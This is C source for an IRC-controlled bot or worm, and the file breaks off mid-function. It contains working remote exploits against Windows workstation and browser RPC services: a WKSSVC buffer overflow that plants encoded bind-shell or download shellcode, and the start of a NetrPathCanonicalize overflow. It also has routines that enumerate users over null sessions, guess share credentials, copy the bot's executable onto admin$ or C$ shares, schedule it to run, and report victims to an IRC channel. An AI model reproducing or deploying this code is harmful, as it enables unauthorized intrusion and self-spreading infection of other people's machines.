char* GetRemoteComputerName(char* ip) {
static char compname[100] = "";
DWORD dwLevel = 102;
LPWKSTA_INFO_102 pBuf = NULL;
NET_API_STATUS nStatus;
LPTSTR pszServerName = NULL;
NETRESOURCE nr;
memset(&nr,0,sizeof(NETRESOURCE));
strcpy(remote_addr,"\\\\");
strcat(remote_addr,ip);
strcat(remote_addr,"\\");
strcat(remote_addr,"admin$");
nr.lpRemoteName= (LPTSTR)remote_addr;
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=NULL;
nr.lpProvider=NULL;
nStatus = fWNetAddConnection2(&nr, NULL,NULL, 0);
mbstowcs(remote_addr2, ip, MB_CUR_MAX );
nStatus = fNetWkstaGetInfo((unsigned short*)remote_addr2,
dwLevel,
(LPBYTE *)&pBuf);
if (nStatus == NERR_Success)
WideCharToMultiByte(CP_ACP, 0, pBuf->wki102_computername, -1, compname, sizeof(compname), NULL, NULL);
if (pBuf != NULL)
fNetApiBufferFree(pBuf);
return compname;
}
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
{
IRC* irc=(IRC*)conn;
//irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
BOOL success=FALSE;
int TargetOS;
// char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
TargetOS = FpHost(exinfo.ip, FP_PORT5K);
if(TargetOS != OS_WINXP)
TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS != OS_WINXP)
return FALSE;
else
success=TRUE;
// irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// parameters
pszTarget=exinfo.ip;
// char URL[MAX_HOSTNAME];
// char fname[_MAX_FNAME];
// sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
// _snprintf(URL,sizeof(URL),
// "ftp://*****:*****@%s:%d/%s",
// (PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname);
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL);
if (!iShellSize)
return FALSE;
// get shellcode
//iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
//if( !iShellSize )
// return FALSE;
// generate exploits buffer
// ========================
ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded));
ZeroMemory(szExploitsData, sizeof(szExploitsData));
ZeroMemory(wszExploitsData, sizeof(wszExploitsData));
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset(szExploitsData,'A',sizeof(szExploitsData)-1);
// new EIP
*(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
_snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget);
mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t));
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
//_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget);
_snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget);
strncat(szIPC,"ipc$",sizeof(szIPC));
ZeroMemory(&NetSource,sizeof(NetSource));
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2(&NetSource,"","",0);
}
// ===================
// connect to pipe
// ===============
//_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget);
_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget);
strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe));
hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hPipe == INVALID_HANDLE_VALUE)
{
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===============
// bind packet
// ===========
ZeroMemory(&BindPacket,sizeof(BindPacket));
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof(BindPacket);
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16);
BindPacket.Interface2.version = 2;
memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16);
// send
if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL))
{
//irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle(hPipe);
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while(nPacketSize % 4)
nPacketSize++;
if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName)
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
//irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
ZeroMemory(pPacket,nPacketSize);
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
ZeroMemory(&pPacket[nPacketPos],8);
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader));
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
//irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
if (success)
{
Sleep(5000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
return TRUE;
}
BOOL NetBios(EXINFO exinfo)
{
char szUsername[300], RemoteName[200], szServer[18];
WCHAR *pszServerName = NULL,sName[500];
LPUSER_INFO_0 pBuf=NULL, pTmpBuf;
DWORD dwLevel=0, dwPrefMaxLen=MAX_PREFERRED_LENGTH, dwEntriesRead=0,
dwTotalEntries=0, dwResumeHandle=0, dwTotalCount=0;
NET_API_STATUS nStatus;
sprintf(szServer,"\\\\%s",exinfo.ip);
MultiByteToWideChar(CP_ACP,0,szServer,-1,sName,sizeof(sName));
pszServerName=sName;
NETRESOURCE nr;
nr.lpLocalName=NULL;
nr.lpProvider=NULL;
nr.dwType=RESOURCETYPE_ANY;
sprintf(RemoteName,"%s\\ipc$",szServer);
nr.lpRemoteName=RemoteName;
if (fWNetAddConnection2(&nr,"","",0) != NO_ERROR) {
fWNetCancelConnection2(RemoteName,0,TRUE);
return FALSE;
}
do {
nStatus = fNetUserEnum(pszServerName, dwLevel, FILTER_NORMAL_ACCOUNT, (LPBYTE*)&pBuf,
dwPrefMaxLen, &dwEntriesRead, &dwTotalEntries, &dwResumeHandle);
fWNetCancelConnection2(RemoteName,0,TRUE);
// If the call succeeds,
if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA)) {
if ((pTmpBuf = pBuf) != NULL) {
for (DWORD i = 0; (i < dwEntriesRead); i++) {
if (pTmpBuf == NULL)
break;
WideCharToMultiByte(CP_ACP,0,pTmpBuf->usri0_name,-1,szUsername,sizeof(szUsername),NULL,NULL);
if ((RootBox(szUsername,szServer,exinfo))==TRUE)
break;
pTmpBuf++;
dwTotalCount++;
}
}
}
if (pBuf != NULL) {
fNetApiBufferFree(pBuf);
pBuf = NULL;
}
} while (nStatus == ERROR_MORE_DATA);
if (pBuf != NULL)
fNetApiBufferFree(pBuf);
if (nStatus == ERROR_ACCESS_DENIED) {
for (int i=0; usernames[i]; i++) {
if ((RootBox(usernames[i],szServer,exinfo))==TRUE)
break;
}
}
return TRUE;
}
BOOL NetConnect(char *szUsername, char *szPassword, char *szServer, EXINFO exinfo)
{
NETRESOURCE nr;
memset(&nr,0,sizeof(NETRESOURCE));
nr.lpRemoteName=szServer;
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=NULL;
nr.lpProvider=NULL;
// Call the WNetAddConnection2 function to make the connection,
// specifying a persistent connection.
DWORD dwResult = fWNetAddConnection2(&nr, (LPSTR)szPassword, (LPSTR)szUsername, 0);
if(dwResult != NO_ERROR) {
Sleep (10);
fWNetCancelConnection2(szServer,CONNECT_UPDATE_PROFILE,TRUE);
return FALSE;
}
WCHAR wszNetbios[200], wszFilename[MAX_PATH];
char szRemoteFile[MAX_PATH], buffer[IRCLINE];
char *sharepath[]={"Admin$\\system32","c$\\winnt\\system32","c$\\windows\\system32","c","d"};
TIME_OF_DAY_INFO *tinfo=NULL;
DWORD JobID;
AT_INFO at_time;
MultiByteToWideChar(CP_ACP,0,szServer,-1,wszNetbios,sizeof(wszNetbios));
NET_API_STATUS nStatus=fNetRemoteTOD(wszNetbios,(LPBYTE *)&tinfo);
if (nStatus == NERR_Success) {
if (tinfo) {
//_snprintf(buffer,sizeof(buffer),"[%s]: Connected to IP: %s (%s/%s).", exploit[exinfo.exploit].name,szServer, szUsername, szPassword);
//addlog(buffer);
int j = 0;;
for (int i=0;i<(sizeof(sharepath) / sizeof(LPTSTR));i++) {
sprintf(szRemoteFile,"%s\\%s\\%s",szServer,sharepath[i],filename);
if ((j=CopyFile(filename,szRemoteFile,FALSE)) != 0)
break;
else if (GetLastError() == ERROR_ACCESS_DENIED) {
if (_access(szRemoteFile,00) == 0) {
szRemoteFile[strlen(szRemoteFile)-5] = (char)((rand()%10)+48);
if ((j=CopyFile(filename,szRemoteFile,FALSE)) != 0)
break;
}
}
}
if (!j) {
fNetApiBufferFree(tinfo);
fWNetCancelConnection2(szServer,CONNECT_UPDATE_PROFILE,TRUE);
return FALSE;
}
DWORD jobtime=tinfo->tod_elapsedt / 60;
jobtime-=tinfo->tod_timezone;
jobtime+=2;
jobtime%=(24*60);
memset(&at_time,0,sizeof(AT_INFO));
at_time.JobTime=jobtime*60000;
MultiByteToWideChar(CP_ACP,0,filename,-1,wszFilename,sizeof(wszFilename));
at_time.Command=wszFilename;
if ((nStatus=fNetScheduleJobAdd(wszNetbios,(BYTE *)&at_time,&JobID)) == NERR_Success) {
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Share: \\%s, User: (%s/%s)",exploit[exinfo.exploit].name,szServer,sharepath[i],szUsername,((strcmp(szPassword,"")==0)?("(no password)"):(szPassword)));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
}
}
fWNetCancelConnection2(szServer,CONNECT_UPDATE_PROFILE,TRUE);
return TRUE;
}
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
int TargetOS;
char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
// check if xp
TargetOS = FpHost( exinfo.ip, FP_RPC );
if( TargetOS != OS_WINXP )
return FALSE;
// parameters
pszTarget = exinfo.ip;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !iShellSize )
return FALSE;
// generate exploits buffer
// ========================
memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
memset( szExploitsData, 0, sizeof( szExploitsData ) );
memset( wszExploitsData, 0, sizeof( wszExploitsData ) );
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );
// new EIP
*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2( &NetSource, "", "", 0 );
}
// ===================
// connect to pipe
// ===============
snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if( hPipe == INVALID_HANDLE_VALUE )
{
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===============
// bind packet
// ===========
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
BindPacket.Interface2.version = 2;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
// send
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
memset( pPacket, 0, nPacketSize );
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
memset( &pPacket[ nPacketPos ], 0, 8 );
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
char buffer[ IRCLINE ];
//_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
BOOL exnetapi (EXINFO exinfo, int nTarget)
{
char szIPC[ 8192 ];
NETRESOURCE NetSource;
DWORD nNullSessionError;
char szPipe[ 8192 ];
HANDLE hPipe;
RPC_ReqBind BindPacket;
DWORD nBytesWritten;
DWORD nBytesRead;
unsigned char RecvBuff[ 8192 ];
NetrPathCanonicalize_Start PStart;
NetrPathCanonicalize_End PEnd;
size_t nPathLen;
size_t nBufferPos;
unsigned char *pPath;
size_t nPacketSize;
unsigned char *pPacket;
RPC_ReqNorm ReqNormalHeader;
bool bExit;
int nCount;
OVERLAPPED ov;
if( _stricmp( exinfo.ip, "." ) )
{
_snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", exinfo.ip );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
nNullSessionError = fWNetAddConnection2( &NetSource, "", "", 0 );
}
_snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", exinfo.ip );
hPipe = CreateFile( szPipe,
GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
NULL );
if( hPipe == INVALID_HANDLE_VALUE )
return false;
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11;
BindPacket.NormalHeader.flags = 3;
BindPacket.NormalHeader.representation = 0x00000010;
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 0;
BindPacket.maxtsize = MAX_FRAG_SIZE;
BindPacket.maxrsize = MAX_FRAG_SIZE;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 );
BindPacket.Interface1.version = 3;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
BindPacket.Interface2.version = 2;
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
return false;
}
ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL );
srand( (int)time( NULL ) );
memset( &PStart, 0x41, sizeof( PStart ) );
memset( &PEnd, 0x41, sizeof( PEnd ) );
PStart.ReferendID = rand();
PStart.Server.length = 1;
PStart.Server.offset = 0;
PStart.Server.maxlength = 1;
PStart.Server_Data = L'';
if( Targets[ nTarget ].bIsWinXP )
{
PEnd.Prefix.length = 1;
PEnd.Prefix.offset = 0;
PEnd.Prefix.maxlength = 1;
memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 );
}
else
{
PEnd.Prefix.length = 2;
PEnd.Prefix.offset = 0;
PEnd.Prefix.maxlength = 2;
memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 );
}
PEnd.OutBufLen = rand() % 250 + 1;
PEnd.Type = rand() % 250 + 1;;
PEnd.Flags = 0;
